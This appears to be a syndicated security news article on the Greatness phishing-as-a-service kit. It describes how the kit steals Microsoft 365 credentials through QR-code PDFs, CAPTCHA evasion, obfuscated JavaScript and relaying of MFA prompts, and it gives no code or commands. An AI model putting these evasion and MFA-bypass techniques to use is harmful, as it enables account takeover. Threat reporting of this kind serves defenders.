Hackers use the Greatness PaaS tool to Steal Microsoft 365 login credentials

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Post Sharing

A new Phishing-as-a-Service (PaaS) tool called Greatness is being used by cybercriminals to steal Microsoft 365 login credentials.

First detected in 2022, Greatness allows attackers to bypass security measures and has been continuously updated with evasion tactics. 

As a result of its ability to save attackers time on development and provide advanced capabilities, it is gaining more and more popularity. 

Law enforcement agencies are working to dismantle these services, with a recent takedown of LabHost.

Attackers are using QR vectors to target both employers and employees, and greatness is being used to compromise user accounts and steal login credentials. 

Attack Flow Of Greatness PaaS Attacks

The Greatness phishing tool initially used malicious HTML attachments disguised as login pages.

ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

Server-side validation determined if an error message or the phishing page would be shown, and after public exposure, attackers shifted to PDF files and URLs to bypass detection. 

Captcha Evasion Display

Now, they use multi-layered evasion, including CAPTCHAs and QR codes in PDFs, to prevent automated analysis before the tool’s verification, which makes it difficult to stop attacks as they rely on publicly available information.

It employs obfuscated content, including dynamically loaded JavaScript libraries and Base64 encoded strings, to hinder analysis, implements anti-bot measures, and encrypts data using AES with a PBKDF2-derived key. 

De-obfuscated Encryption Function

A JWT is generated with a Base64 encoded timestamp and used alongside encrypted data in AJAX requests.

Error handling is incorporated for various scenarios, including invalid data and failed requests. 

The script utilizes a Telegram token and API key for security and redirects users based on specific parameters, and obfuscation techniques like Base64 encoding and string manipulation further complicate the analysis.  

De-obfuscated Function Call

It leverages an Adversary In The Middle (AiTM) technique to bypass Multi-Factor Authentication (MFA), as the phishing kit steals credentials and intercepts the MFA prompt from the user, then relays the MFA information to the legitimate service and uses the session cookie to gain access while impersonating the victim. 

Greatness primarily targets the United States financial services industry but has also been used against the manufacturing, energy, retail, and consulting sectors, where the phishing emails often contain a QR code that leads to a malicious link. 

Detection Graph

Researchers at Trellix found malicious URLs that steal user credentials and some that lead to seemingly legitimate shared files or eFax pages, which highlights the evolving threat of Greatness, a tool used by cybercriminals to bypass security measures. 

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers